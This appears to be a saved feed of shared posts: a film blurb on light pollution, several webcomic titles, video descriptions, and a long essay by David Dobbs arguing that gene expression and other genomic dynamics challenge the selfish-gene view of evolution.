Shared posts

15 Aug 00:05

Lost in Light

Lost in Light, a short film on how light pollution affects the view of the night skies. Shot mostly in California, the movie shows how the view gets progressively better as you move away from the lights. Finding locations to shoot at every level of light pollution was a challenge and getting to the darkest skies with no light pollution was a journey in itself. Here’s why I think we should care more.

The night skies remind us of our place in the Universe. Imagine if we lived under skies full of stars. That reminder we are a tiny part of this cosmos, the awe and a special connection with this remarkable world would make us much better beings - more thoughtful, inquisitive, empathetic, kind and caring. Imagine kids growing up passionate about astronomy looking for answers and how advanced humankind would be, how connected and caring we’d feel with one another, how noble and adventurous we’d be. How compassionate with fellow species on Earth and how one with Nature we’d feel. Imagine a world where happiness of the soul is more beautiful. Ah, I feel so close to inner peace. I can only wonder how my and millions of other lives would have changed.

But in reality, most of us live under heavily light polluted skies and some have never even seen the Milky Way. We take the skies for granted and are rather lost in our busy lives without much care for the view of the stars.

How does light pollution affect the night skies and quite possibly our lives?

For licensing inquiries - sriramnitt.pm@gmail.com
Website - srirammurali.com
Instagram - instagram.com/sriram_murali
Music - A Thousand Years by David A. Molina(musicbed.com)

To order prints - pramfotos.com

Copyright © All Rights Reserved

Cast: Sriram Murali

01 Sep 17:38

Cognitive bias cheat sheet

by Buster Benson

Because thinking is hard.

Continue reading on Better Humans »

12 Sep 00:00

Earth Temperature Timeline

[After setting your car on fire] Listen, your car's temperature has changed before.
05 Sep 18:01

Do we have a back-up in the audience?

by CommitStrip

10 Aug 07:28

Comic: God Tier

by Tycho@penny-arcade.com (Tycho)
New Comic: God Tier
20 Jul 05:41

World's First Tattoo by Industrial Robot

For more information about Pierre and Johan visit:
appropriateaudiences.net
appropriateaudiences.tumblr.com
instagram.com/appropriate_audiences

For more information about Autodesk's Pier 9 Artist in Residence Program:
autodesk.com/air

Director & Editor - Charlie Nordstrom (northstreamfilm.com)
Cameras - Blue Bergen, Charlie Nordstrom, Sebastian Morales Prado
Archive Footage - Renaud Skyronka & Louis Pille Schneider

Music:

"Erotic Robotics"
by The Polish Ambassador

"Yellows & Browns"
by Koen Park

Available on Free Music Archive - freemusicarchive.org
Under CC by license - Attribution Noncommercial 4.0 International

Cast: Pier 9, Charlie Nordstrom, Blue Bergen, appropriate audiences and Sebastian Morales

25 Aug 16:05

A very comprehensive and precise spec

by CommitStrip

Strip-Les-specs-c'est-du-code-(650-final)(english)

23 Aug 19:41

When you can’t not listen.

by CommitStrip

Strip-Les-discussions-genantes-(650-final)(english)

07 Jul 19:44

A triste geração que está sendo convencida de que não sabe amar

by Laura Pires

Não aguento mais essa história de amor líquido

Continue reading on TRENDR »

12 Jul 12:38

The Lone Man Building a Cathedral By Hand

For 53 years, Justo Gallego has been building a cathedral by hand on the outskirts of Madrid almost entirely by himself. Gallego has no formal architecture or construction training, but that hasn't stopped him from toiling on this herculean task. At 90 years old, Gallego knows that he will not be able to finish the project in his lifetime. But he keeps at it anyway, day after day, driven by his faith.

Cast: Great Big Story

11 Jul 17:35

A bad workman blames his tools

by CommitStrip

Strip-L'outil-du-métier-(english)-(650-final)

08 Jul 00:00

Gnome Ann

President Andrew Johnson once said, "If I am to be shot at, I want Gnome Ann to be in the way of the bullet."
04 Jul 21:38

Die, selfish gene, die - For decades, the selfish gene metaphor let us view evolution with new clarity. Is it now blinding us? by David Dobbs

A couple of years ago, at a massive conference of neuroscientists — 35,000 attendees, scores of sessions going at any given time — I wandered into a talk that I thought would be about consciousness but proved (wrong room) to be about grasshoppers and locusts. At the front of the room, a bug-obsessed neuroscientist named Steve Rogers was describing these two creatures — one elegant, modest, and well-mannered, the other a soccer hooligan.

The grasshopper, he noted, sports long legs and wings, walks low and slow, and dines discreetly in solitude. The locust scurries hurriedly and hoggishly on short, crooked legs and joins hungrily with others to form swarms that darken the sky and descend to chew the farmer’s fields bare.

Related, yes, just as grasshoppers and crickets are. But even someone as insect-ignorant as I could see that the hopper and the locust were radically different animals — different species, doubtless, possibly different genera. So I was quite amazed when Rogers told us that grasshopper and locust are in fact the same species, even the same animal, and that, as Jekyll is Hyde, one can morph into the other at alarmingly short notice.

Not all grasshopper species, he explained (there are some 11,000), possess this morphing power; some always remain grasshoppers. But every locust was, and technically still is, a grasshopper — not a different species or subspecies, but a sort of hopper gone mad. If faced with clues that food might be scarce, such as hunger or crowding, certain grasshopper species can transform within days or even hours from their solitudinous hopper states to become part of a maniacally social locust scourge. They can also return quickly to their original form.

In the most infamous species, Schistocerca gregaria, the desert locust of Africa, the Middle East and Asia, these phase changes (as this morphing process is called) occur when crowding spurs a temporary spike in serotonin levels, which causes changes in gene expression so widespread and powerful they alter not just the hopper’s behaviour but its appearance and form. Legs and wings shrink. Subtle camo colouring turns conspicuously garish. The brain grows to manage the animal’s newly complicated social world, which includes the fact that, if a locust moves too slowly amid its million cousins, the cousins directly behind might eat it.

How does this happen? Does something happen to their genes? Yes, but — and here was the point of Rogers’s talk — their genes don’t actually change. That is, they don’t mutate or in any way alter the genetic sequence or DNA. Nothing gets rewritten. Instead, this bug’s DNA — the genetic book with millions of letters that form the instructions for building and operating a grasshopper — gets reread so that the very same book becomes the instructions for operating a locust. Even as one animal becomes the other, as Jekyll becomes Hyde, its genome stays unchanged. Same genome, same individual, but, I think we can all agree, quite a different beast.

Why?

Transforming the hopper is gene expression — a change in how the hopper’s genes are ‘expressed’, or read out. Gene expression is what makes a gene meaningful, and it’s vital for distinguishing one species from another. We humans, for instance, share more than half our genomes with flatworms; about 60 per cent with fruit flies and chickens; 80 per cent with cows; and 99 per cent with chimps. Those genetic distinctions aren’t enough to create all our differences from those animals — what biologists call our particular phenotype, which is essentially the recognisable thing a genotype builds. This means that we are human, rather than wormlike, flylike, chickenlike, feline, bovine, or excessively simian, less because we carry different genes from those other species than because our cells read differently our remarkably similar genomes as we develop from zygote to adult. The writing varies — but hardly as much as the reading.

This raises a question: if merely reading a genome differently can change organisms so wildly, why bother rewriting the genome to evolve? How vital, really, are actual changes in the genetic code? Do we always need DNA changes to adapt to new environments? Are there other ways to get the job done? Is the importance of the gene as the driver of evolution being overplayed?

You’ve probably noticed that these questions are not gracing the cover of Time or haunting Oprah, Letterman, or even TED talks. Yet for more than two decades they have been stirring a heated argument among geneticists and other evolutionary theorists. As evidence of the power of rapid gene expression and other complex genomic dynamics mounts, these questions might (or might not, for pesky reasons we’ll get to) begin to change not only mainstream evolutionary theory but our more everyday understanding of evolution.

Twenty years ago, phase changes such as those that turn grasshopper to locust were relatively unknown, and, outside of botany anyway, rarely viewed as changes in gene expression. Now, notes Mary Jane West-Eberhard, a wasp researcher at the Smithsonian Tropical Research Institute in Panama, sharp phenotype changes due to gene expression are ‘everywhere’. They show up in gene-expression studies of plants, microbes, fish, wasps, bees, birds, and even people. The genome is continually surprising biologists with how fast and fluidly it can change gene expression — and thus phenotype.

These discoveries closely follow the recognition, during the 1980s, that gene-expression changes during very early development — such as in embryos or sprouting plant seeds — help to create differences between species. At around the same time, genome sequencing began to reveal the startling overlaps mentioned above between the genomes of starkly different creatures. (To repeat: you are 80 per cent cow.)

Shapeshifter; The Locust. Photo by Ocean/Corbis Shapeshifter: the locust. Photo by Ocean/Corbis

Gregory Wray, a biologist at Duke University in North Carolina who studies fruit flies, sees this flexibility of genomic interpretation as a short path to adaptive flexibility. When one game plan written in the book can’t provide enough flexibility, fast changes in gene expression — a change in the book’s reading — can provide another plan that better matches the prevailing environment.

‘Different groups of animals succeed for different reasons,’ says Wray. ‘Primates, including humans, have succeeded because they’re especially flexible. You could even say flexibility is the essence of being a primate.’

According to Wray, West-Eberhard and many others, this recognition of gene expression’s power, along with other dynamics and processes unanticipated by mainstream genetic theory through the middle of last century, requires that we rethink and expand the way we view genes and evolution. For a century, the primary account of evolution has emphasised the gene’s role as architect: a gene (or gene variant) creates a trait that either proves advantageous or not, and is thus selected for, changing a species for the better, or not. Thus, a genetic blueprint creates traits and drives evolution.

This gene-centric view, as it is known, is the one you learnt in high school. It’s the one you hear or read of in almost every popular account of how genes create traits and drive evolution. It comes from Gregor Mendel and the work he did with peas in the 1860s. Since then, and especially over the past 50 years, this notion has assumed the weight, solidity, and rootedness of an immovable object.

But a number of biologists argue that we need to replace this gene-centric view with one that more heavily emphasises the role of more fluid, environmentally dependent factors such as gene expression and intra-genome complexity — that we need to see the gene less as an architect and more as a member of a collaborative remodelling and maintenance crew.

‘We have a more complicated understanding of football than we do genetics and evolution. Nobody thinks just the quarterback wins the game’

They ask for something like the rejection a century ago of the Victorian-era ‘Great Man’ model of history. This revolt among historians recast leaders not as masters of history, as Tolstoy put it, but as servants. Thus the Russian Revolution exploded not because Marx and Lenin were so clever, but because fed-up peasants created an impatience and an agenda that Marx articulated and Lenin ultimately hijacked. Likewise, D-Day succeeded not because Eisenhower was brilliant but because US and British soldiers repeatedly improvised their way out of disastrously fluid situations. Wray, West-Eberhard and company want to depose genes likewise. They want to cast genes not as the instigators of change, but as agents that institutionalise change rising from more dispersed and fluid forces.

This matters like hell to people like West-Eberhard and Wray. Need it concern the rest of us?

It should. We are rapidly entering a genomic age. A couple of years ago, for instance, I became one of what is now almost a half-million 23andMe customers, paying the genetic-profiling company to identify hundreds of genetic variants that I carry. I now know ‘genes of interest’ that reveal my ancestry and help determine my health. Do I know how to make sense of them? Do they even make sense? Sometimes; sometimes not. They tell me, for instance, that I’m slightly more likely than most to develop Alzheimer’s disease, which allows me to manage my health accordingly. But those genes also tell me I should expect to be short and bald, when in fact I’m 6’3” with a good head of hair.

Soon, it will be practical to buy my entire genome. Will it tell me more? Will it make sense? Millions of people will face this puzzle. Along with our doctors, we’ll draw on this information to decide everything from what drugs to take to whether to have kids, including kids a few days past conception — a true make-or-break decision.

Yet we enter this genomic age with a view of genetics that, were we to apply it, say, to basketball, would reduce that complicated team sport to a game of one-on-one. A view like that can be worse than no view. It tempts you to think you understand the game when you don’t. We need something more complex.

‘And it’s not as if people can’t handle things more complex,’ says Wray. ‘Educated people handle ideas more complex than this all the time. We have a more complicated understanding of football than we do genetics and evolution. Nobody thinks just the quarterback wins the game.

‘We’re stuck in an outmoded way of thinking that should have fallen long ago.’

This outmoded thinking grew from seeds planted 150 years ago by Gregor Mendel, the monk who studied peas. Mendel spent seven years breeding peas in a five-acre monastery garden in the town of Brno, now part of the Czech Republic. He crossed plants bearing wrinkled peas with those bearing smooth peas, producing 29,000 plants altogether. When he was done and he had run the numbers, he had exposed the gene.

This was the Holy Shit! moment that launched genetics’ Holy Shit! century

Mendel didn’t expose the physical gene, of course (that would come a century later), but the conceptual gene. And this conceptual gene, revealed in the tables and calculations of this math-friendly monk, seemed an agent of mathematical neatness. Mendel’s thousands of crossings showed that the traits he studied — smooth skin versus wrinkled, for instance, or purple flower versus white — appeared or disappeared in consistent ratios dictated by clear mathematical formulas. Inheritance appeared to work like algebra. Anything so math-friendly had to be driven by discrete integers.

It was beautiful work. Yet when Mendel first published his findings in 1866, just seven years after Charles Darwin’s On the Origin of Species, no one noticed. Starting in 1900, however, biologists rediscovering his work began to see that these units of heredity he’d discovered — dubbed genes in 1909 — filled a crucial gap in Darwin’s theory of evolution. This recognition was the Holy Shit! moment that launched genetics’ Holy Shit! century. It seemed to explain everything. And it saved Darwin.

Darwin had legitimised evolution by proposing for it a viable mechanism — natural selection, in which organisms with the most favourable traits survive and multiply at higher rates than do others. But he could not explain what created or altered traits.

Mendel could. Genes created traits, and both would spread through a population if a gene created a trait that survived selection.

That much was clear by 1935. Naturally, some kinks remained, but more math-friendly biologists soon straightened those out. This took most of the middle part of the 20th century. Biologists now call this decades-long project the modern evolutionary synthesis. And it was all about maths.

The first vital calculations were run in the 1930s, when Ronald Fisher, J B S Haldane and Sewall Wright, two Brits and an American working more or less separately, worked out how Mendel’s rather binary genetic model could create not just binary differences such as smooth versus wrinkled peas but the gradual evolutionary change of the sort that Darwin described. Fisher, Haldane and Wright, working the complicated maths of how multiple genes interacted through time in a large population, showed that significant evolutionary change often revealed itself as many small changes yielded a large effect, just as a series of small nested equations within a long algebra equation could.

The second kink was tougher. If organisms prospered by out-competing others, why did humans and some other animals help one another? This might seem a non-mathy problem. Yet in the 1960s, British biologist William Hamilton and American geneticist George Price, who was working in London at the time, solved it too with maths, devising formulas quantifying precisely how altruism could be selected for. Some animals act generously, they explained, because doing so can aid others, such as their children, parents, siblings, cousins, grandchildren, or tribal mates, who share or might share some of their genes. The closer the kin, the kinder the behaviour. Thus, as Haldane once allegedly quipped, ‘I would lay down my life for two brothers or eight cousins.’

Thus maths reconciled Mendel and Darwin and made modern genetics and evolutionary theory a coherent whole. Watson and Crick’s 1953 discovery of the structure of DNA simply iced the cake: now we knew the structure that performed the maths.

Finally, also in the 1960s, Hamilton and American George Williams upped the ante on the gene’s primacy. With fancy maths, they argued that we should view any organism, including any human, as merely a sort of courier for genes and their traits. This flipped the usual thinking. It made the gene vital and the organism expendable. Our genes did not exist for us. We existed for them. We served only to carry these chemical codes forward through time, like those messengers in old sword-and-sandal war movies who run non-stop for days to deliver data and then drop dead. A radical idea. Yet it merely extended the logic of kin selection, in which any gene-courier — say, a mom watching her children’s canoe overturn — would risk her life to let her kin carry forth her DNA.

This notion of the gene as the unit selected, and the organism as a kludged-up cart for carrying it through time, placed the gene smack at the centre of things. It granted the gene something like agency.

At first, not even many academics paid this any heed. This might be partly because people resist seeing themselves as donkey carts. Another reason was that neither Hamilton nor Williams were masterly communicators.

But 15 years after Hamilton and Williams kited this idea, it was embraced and polished into gleaming form by one of the best communicators science has ever produced: the biologist Richard Dawkins. In his magnificent book The Selfish Gene (1976), Dawkins gathered all the threads of the modern synthesis — Mendel, Fisher, Haldane, Wright, Watson, Crick, Hamilton, and Williams — into a single shimmering magic carpet.

These days, Dawkins makes the news so often for things like pointing out that a single college in Cambridge has won more Nobel Prizes than the entire Muslim world, that some might wonder how he ever became so celebrated. The Selfish Gene is how. To read The Selfish Gene is to be amazed, entertained, transported. For instance, when Dawkins describes how life might have begun — how a randomly generated strand of chemicals pulled from the ether could happen to become a ‘replicator’, a little machine that starts to build other strands like itself, and then generates organisms to carry it — he creates one of the most thrilling stretches of explanatory writing ever penned. It’s breathtaking.

Dawkins reveals the gene as not just the centre of the cell but the centre of all life, agency, and behaviour

Dawkins assembles genetics’ dry materials and abstract maths into a rich but orderly landscape through which he guides you with grace, charm, urbanity, and humour. He replicates in prose the process he describes. He gives agency to chemical chains, logic to confounding behaviour. He takes an impossibly complex idea and makes it almost impossible to misunderstand. He reveals the gene as not just the centre of the cell but the centre of all life, agency, and behaviour. By the time you’ve finished his book, or well before that, Dawkins has made of the tiny gene — this replicator, this strip of chemicals little more than an abstraction — a huge, relentlessly turning gearwheel of steel, its teeth driving smaller cogs to make all of life happen.

It’s a gorgeous story. Along with its beauty and other advantageous traits, it is amenable to maths and, at its core, wonderfully simple. It has inspired countless biologists and geneticists to plumb the gene’s wonders and do brilliant work. Unfortunately, say Wray, West-Eberhard and many others, the selfish-gene story is so focused on the gene’s singular role in natural selection that in an age when it’s ever more clear that evolution works in ways far more clever and complex than we realise, the selfish-gene model increasingly impoverishes both scientific and popular views of genetics and evolution. As both conceptual framework and metaphor, the selfish-gene has helped us see the gene as it revealed itself over the 20th century. But as a new age and new tools reveal a more complicated genome, the selfish-gene is blinding us.

For over two decades, Wray, West-Eberhard and other evolutionary theorists — such as Massimo Pigliucci, professor of philosophy at the City University of New York; Eva Jablonka, a geneticist and historian of science at Tel Aviv University, London; Stuart Kauffman, professor of biochemistry and mathematics at the University of Vermont; Stuart A Newman, professor of cell biology and anatomy at the New York Medical College; and the late Stephen Jay Gould, to name a few — have been calling for an ‘extended modern synthesis’ to replace the gene-centric view of evolution with something richer. They do so even though they agree with most of what Dawkins says a gene does. They agree, in essence, that the gene is a big cog, but would argue that the biggest cog doesn’t necessarily always drive the other cogs. In many cases, the other cogs drive the gene. The gene, in short, just happens to be the biggest, most obvious part of the trait-making inheritance and evolutionary machine. But not the driver.

Another way to put it: Mendel stumbled over the wrong chunk of gold.

Mendel ran experiments that happened to reveal strong single-gene dynamics whose effects — flower colour, skin texture — can seem far more significant than they really are. Many plant experiments since then, for instance, have shown that environmental factors such as temperature changes can spur gene-expression changes that alter a plant far more than Mendel’s gene variants do. As with grasshoppers, a new environment can quickly turn a plant into something almost unrecognisable from its original form. If Mendel had owned an RNA sequencing machine and was in the habit of tracking gene expression changes, he might have spotted these. But sequencers didn’t exist, so he crossed plants instead, and saw just one particularly obvious way that an organism can change.

The gene-centric view is thus ‘an artefact of history’, says Michael Eisen, an evolutionary biologist who researches fruit flies at the University of California, Berkeley. ‘It rose simply because it was easier to identify individual genes as something that shaped evolution. But that’s about opportunity and convenience rather than accuracy. People confuse the fact that we can more easily study it with the idea that it’s more important.’

The gene’s power to create traits, says Eisen, is just one of many evolutionary mechanisms. ‘Evolution is not even that simple. Anyone who’s worked on systems sees that natural selection takes advantage of the most bizarre aspects of biology. When something has so many parts, evolution will act on all of them.

‘It’s not that genes don’t sometimes drive evolutionary change. It’s that this mutational model — a gene changes, therefore the organism changes — is just one way to get the job done. Other ways may actually do more.’

Like what other ways? What significant and plausible evolutionary dynamics stand in tension with a single-gene-centred model? What gets obscured by the insistence that a ‘selfish gene’, a coherent, solitary replicator, is the irreducible and ever-present driver of evolution?

A shortlist of such dynamics would include some of the evolutionary dynamics being proposed by anthropologists, such as cultural transmission of knowledge and behaviour that allow social species ranging from bees to humans to adapt to changing environments without genetic alterations; and culture-gene evolution, a related idea, in which culture is not the ‘handmaiden’ of genes, but another source of transmissible adaptive information whose elements co-evolves with genes, each affecting the other.

Also in tension with the selfish-gene model are epigenetic changes suggested by recent research, such as methylation and other alterations to chemical wrappings around DNA, that can modulate DNA’s expression without changing its sequence. Such epigenetic changes may provide a way to pass heritable traits down through at least a few generations without changing any actual genes. To be sure, this research is still unproven as a significant evolutionary force. But while it is clearly important enough to pursue, many defenders of the selfish-gene model dismiss it out of hand.

Finally, the selfish-gene model is in tension with various ‘interesting evolutionary phenomena’, as Gregory Wray puts it in Evolution: The Extended Synthesis, ‘that are apparent only at the scale of hundreds or thousands of genes’ — a scale only made viewable during the past decade or so, as we’ve learnt to rapidly sequence entire genomes.

Of these genomic dynamics, perhaps the most challenging to the selfish-gene story are epistatic or gene-gene interactions. Epistasis refers to the fact that the presence of some genes (or their variants) can have profound and unpredictable influences on the activity and effects generated by other genes. To put it another way, a gene’s effect can vary wildly depending on which combination of other genes it finds itself with. (Think Jerry Garcia playing with different musical partners.)

Epistasis is hardly a new concept. In fact, geneticists have been arguing about its importance ever since R.A. Fisher and Sewall Wright bickered about it in the 1920s. Dawkins acknowledges a role for gene-gene interactions in The Selfish Gene, noting that ‘the effect of any one gene depends on interaction with many others.’ But research since then show that these interactions take place in non-linear, non-additive ways of a complexity impossible to understand at the time Dawkins wrote his book. Casey Greene and Jason Moore of Dartmouth, for instance, recently found that in some cases epistatic interactions seem to warp conventional gene-trait relationships so profoundly that they can often negate the gene as a trait’s reliable carrier.

Individual bees morph from worker to guard to scout by gene expression alone, depending on the needs of the hive

This is not merely a matter of one gene muffling or amplifying another, though both these things happen. And it’s not a matter of additive effects, such as four ‘tall’ genes making you taller than would two. Rather, these multi-gene epistatic interactions can create endless possible combinations of mutual influence in which any given gene’s contribution seems to rise less from its inherent trait-making power than from what company that gene finds itself keeping. To draw on P.Z. Myers’ apt analogy, epistasis means that single genes often carry little more inherent significance than individual playing cards do in poker. In a poker hand, the significance and effect of a two of hearts — its ‘trait’ — depend so heavily on the other cards you’re holding that it’s almost meaningless to say the card has any replicable power on its own. It’s replicable in that it’s a two of hearts every time it’s dealt. But it can deliver the same effect in subsequent generations only if it’s dealt not just into the exact same handful of cards, but into a round in which all the other players at the table also hold the same cards as before — and happen to bet, hold, and fold in exactly the same way. Not something to count on.

And a two of hearts is a far more coherent thing than is a gene. One of the peskiest problems of leaning too heavily on a gene-centric model these days is that the definition of the word ‘gene’ gets ever more various and slippery.

Even as a technical term, the word carries at least a half-dozen meanings, and more are added as science finds new tools for exploring the genome. This alone makes it either a poor candidate for a popular meme — or, if you value flexibility over exactitude, perhaps a perfect one, since its meaning can be defended or reshaped or expanded to suit the occasion. If you expand the meaning to be ‘the thing essential to all true heredity and selection’, you can then give the gene primary credit for any discovered or proposed evolutionary force in which the gene seems to be involved — and reject outright any proposed evolutionary force that doesn’t seem to involve genes.

But the gene’s definition is not just semantically vague. As geneticists explore the genome’s previously uncharted stretches, they’re finding that a lot of the work conventionally attributed to ‘genes’ (in the sense of consistent, reasonably well defined clusters of DNA) appears to be done instead by networks of genes and strange DNA elements that doubly defy the selfish-gene model.

These regulatory networks challenge the selfish-gene model first because they include DNA elements not conventionally defined as genes. More important, some researchers believe these networks challenge the selfish-gene model because they often seem to behave not like selfish entities balancing their separate agendas, in selfish-gene style, but like managerial teams regulating the behaviour of individual genes for the interest of the organism. The chromosome’s three-dimensional nature brings those regulatory chunks into contact with individual genes in highly unpredictable ways. With each gene ‘surrounded by an ocean’ of such regulatory elements, as molecular biophysicist Joe Dekker told WIRED, each gene ‘can touch and interact with a whole collection of them’. Yale geneticist Mark Gerstein found that the genes in these networks sometimes seem to get selected for even if they don’t have important effects on their own. In other cases they seem to have effects but be exempt from selection pressure.

These regulatory elements now appear to grossly outnumber the actual genes, possibly by as much as 50 to 1. As Yale geneticist Mark Gerstein politely notes, the complexity of these regulatory networks, along with their ad hoc management-team nature, raise the question of what’s being selected: individual genes, as the selfish-gene model proposes, or the management team, by some process still hidden amid all this complexity. Others, such as Cold Spring Harbor geneticist Thomas Gingeras, question outright whether the transcript (the marching orders a gene issues to begin gene expression) should replace the gene as the genome’s functional unit. These issues are not merely academic; resolving them could help solve mysteries about cancer and other diseases.

Such dynamics have emerged only in the last decade or so, as researchers have been able to examine the genome more closely. Yet even though we so far ‘have only a dim idea of how all this works’, as Gregory Wray wrote in 2010, it ‘is clear … that these kinds of assumption-violating exceptions are not rare.’

Wray’s language here is crucial: he’s not saying these findings refute the details of the gene-centric model. He’s saying they violate the model’s assumptions.

And this is the crux of this entire dispute: The point is not whether the findings of a genomic age or of anthropology refute the selfish-gene model, invalidate its theoretical details, or debunk the modern synthesis. Mostly they don’t. The selfish-gene model is roomy enough to host many of these findings. It has shown a uncanny ability to do so. But as time passes it does so ever more uncomfortably, for both host and guests. Some findings or ideas must be almost forced in. Others get prematurely locked out.

The selfish-gene model and metaphor can probably be stretched even more to account for some of these things. But in an age when assumption-violating ideas from genomic studies, anthropology, and other fields are flourishing, does the selfish gene story remain the best way to account for them? Does it make sense to attach these proliferating findings and ideas on to the selfish-gene story as appendices? Or is it time to find another story? It may be that the gene is always a player. But it is rarely the only player. And — may I speak metaphorically? — it may (or may not) be that the gene always behaves as if it were selfish. But that doesn’t mean it always gets its way.

One of the assumption-violating exceptions Wray refers to is gene expression’s breadth of power. In the social wasps that Mary Jane West-Eberhard has been studying in Panama since 1979, many of the most important distinctions among a colony’s individuals rise not from differences in their genomes, which vary little, but from the plasticity born of gene expression. This starts with the queen, who is genetically identical to her thousands of sisters yet whose gene expression makes her not only larger, but singles her out as the colony’s reproductive unit. Likewise with most honeybees. In social honeybees, the differences between workers, guards, and scouts all arise from gene expression, not gene sequence. Individual bees morph from one form to another — worker to guard to scout — by gene expression alone, depending on the needs of the hive.

As described above, the questionable coherence of genes seems to apply especially to gene regulation — as do epistatic networks that further undermine the gene’s primacy. So while it’s clear that DNA plays a key role in regulating gene expression, it is not clear that all these ‘regulatory genes’ are the selfish genes of the Dawkins model.

This is but one reason why West-Eberhard, among others, has been long trying to cure the ‘cyclic amnesia’ that she says has ignored 150 years of evidence that the gene’s centrality is overplayed. West-Eberhard is a particularly articulate advocate. Yet she’s frustrated at how little she’s been able to change things.

As a David to Dawkins’s Goliath, West-Eberhard faces distinct challenges. For starters, she’s a she while Dawkins is a he, which should not matter but does. And while Dawkins holds forth from Oxford, one of the most prestigious universities on earth, and deploys from London an entire foundation in his name, West-Eberhard studies and writes from a remote outpost in Central America. Dawkins commands locust-sized audiences any time he speaks and probably turns down enough speaking engagements to fill five calendars; West-Eberhard speaks mainly to insect-crazed colleagues at small conferences. Dawkins wrote a delicious 300-page book that has sold tens of millions of copies; West-Eberhard has written a bunch of fine obscure papers and an 800-page tome, Developmental Plasticity and Evolution (2003), which, though not without its sweet parts, is generally consumed as a meal of obligation.

She does have her pithy moments. There are times, she says, when ‘the gene does not lead. It follows.’

Massimo Piglucci and Gerd Muller use the same language in Evolution: The Extended Synthesis. By ‘the gene follows’, they mean that in complex organisms particularly, dynamics other than gene alterations, ranging from gene expression to complex gene regulation to developmental pathways formed by culture, can create heritable adaptations that either remain on their own or later become ‘fixed’ or locked in by genes.

One way in which the gene follows is through genetic assimilation — a clunky term for a graceful process. This can look Lamarckian, but it is not. It’s the development of a heritable change through flexible gene-expression responses that later get ‘fixed,’ or locked in, by a change in genotype. It takes a moment to explain. But let’s give it a run.

Genetic assimilation involves a three-step process.

First, an organism adapts to a changing environment by altering its gene expression to change its phenotype — its form or behaviour. Second, a gene emerges that locks in that phenotypic change. Finally, the gene spreads through the population.

For example, suppose you’re a predator. You live with others of your ilk in dense forest. Your kind hunts by stealth: you hide among trees, then jump out and snag your meat. You needn’t be fast, just sneaky and quick off the mark.

They didn’t inherit your speed in any Lamarckian way. Rather, like you, they simply developed it through gene expression driven by running so much

Then a big event — maybe a forest fire, or a plague that kills all your normal prey — forces you into a new environment. This new place is more open, which nixes your jump-and-grab tactic, but contains juicy little wild pigs that you can outrun if you sprint really hard. You start running down these critters. As you do, certain genes ramp up expression to build more muscle and fire the muscles more quickly. You get faster. You’re becoming a different animal.

You mate with another hunter. Your kids grow up to hunt with you. Since they hunt and practice hunting from early on, they too become fast — maybe faster than you, since they started younger. They didn’t inherit your speed in any Lamarckian way. Rather, like you, they simply developed it through gene expression driven by running so much. The same thing happens with their children: they run early, so they’re fast. Their speed is environmentally dependent. Your descendants keep this greater speed (greater, that is, than your ancestors’) for as long as they’re running down little pigs. The hunt makes them faster. But if they could get meals without sprinting, their speed would fade.

Now comes the second step: Several generations down the line, a beneficial mutation occurs in one of your descendants. Most mutations are neutral and many are bad. But this one’s good: It creates faster muscle fibres that let this descendant of yours — let’s call her Diana — easily run faster than her fastest siblings and cousins ever could. She flies.

Finally comes the third step: Diana’s children inherit the gene, as do some of theirs, and because their speed wows their mating prospects, Diana’s descendants mate early and often, bearing many kids. Thus this runner’s gene spreads through the generations until it becomes fixed in the population.

Now the thing is complete. An adaptive trait you originally developed through gene expression alone is made more permanent in your descendants by a new gene. Had the gene showed up back when you lived in the forest and speed didn’t mean anything, it would have given no advantage, and instead of being selected for, that speed gene would have disappeared or remained present but uncommon. But because hunting gave the gene value, the population took it in and spread it wide. The gene didn’t drive the train; it hopped aboard.

This isn’t the gene-centric world in which genotype creates phenotype. It’s a phenotype accommodating a new genotype by making it valuable.

Genetic assimilation was recognised as a possibility in the 1940s, but as Massimo Pigliucci and Courtney Murren put it, it was ‘attacked as of minor importance during the ‘hardening’ of the neo-Darwinian synthesis and … relegated to a secondary role for decades’. Interest has surged lately as gene expression becomes more apparent, and biologists are starting to spot the process in the field. No one proposes that genetic assimilation happens all the time or even commonly, or that it widely replaces conventional gene-driven evolution. But its existence suggests how gene expression’s fluidity can combine with conventional genetic dynamics to broaden evolution’s reach.

Gene Robinson, an entomologist who studies honeybees at the University of Illinois, says genetic assimilation could well have helped to create African honeybees, the ‘killer bee’ subspecies that is genetically distinct from the sweeter European honeybees that most beekeepers keep. Honeybee hives in certain parts of Africa, he says, were and are raided by predators more often than hives elsewhere, so their inhabitants had to react more sharply to attacks. This encouraged gene-expression changes that made the African bees respond more aggressively to threat. When new genes showed up that reinforced this aggression, those genes would have been selected for and spread through the population. This, Robinson says, is quite likely how African bees became genetically distinct from their European honeybee cousins. And they’d have been led there not by a gene, but by gene expression.

After several weeks of reading and talking to this phenotypic plasticity crowd, I phoned Richard Dawkins to see what he thought of all this. Did genes follow rather than lead? I asked him specifically about whether processes such as gene assimilation might lead instead. He said that genetic assimilation doesn’t really change anything, because since the gene ends up locking in the change and carrying it forward, it all comes back to the gene anyway.

‘This doesn’t modify the gene-centric model at all,’ he said. ‘The gene-centric model is all about the gene being the unit in the hierarchy of life that is selected. That remains the gene.’

‘He’s backfilling,’ said West-Eberhard. ‘He and others have long been arguing for the primacy of an individual gene that creates a trait that either survives or doesn’t.’

Yet West-Eberhard understands why many biologists stick to the gene-centric model. ‘It makes it easier to explain evolution,’ she says. ‘I’ve seen people who work in gene expression who understand all of this. But when they get asked about evolution, they go straight to Mendel. Because people understand it more easily.’ It’s easy to see why: even though life is a zillion bits of biology repeatedly rearranging themselves in a webwork of constantly modulated feedback loops, the selfish-gene model offers a step-by-step account as neat as a three-step flow chart. Gene, trait, phenotype, done.

In other words, the gene-centric model survives because simplicity is a hugely advantageous trait for an idea to possess. People will select a simple idea over a complex idea almost every time. This holds especially in a hostile environment, like, say, a sceptical crowd. For example, Sean B Carroll, professor of molecular biology and genetics at the University of Wisconsin, spends much of his time studying gene expression, but usually uses gene-centric explanations, because when talking to the public, he finds a simple story is a damned good thing to have.

Which drives West-Eberhard nuts.

‘Dawkins understands very well that gene expression is powerful,’ she says. ‘He sees things are more complex than a selfish gene. He could turn on its head the whole language.’

Yet Dawkins, and with him much of pop science, sticks to the selfish gene. The gene explains all. So far it has worked. The extended synthesis crowd has published scores of papers, quite a few books, and held meetings galore. They have changed the way many biologists think about evolution. But they have scarcely touched the public’s understanding. And they have not found a way to displace a meme so powerful as the selfish gene.

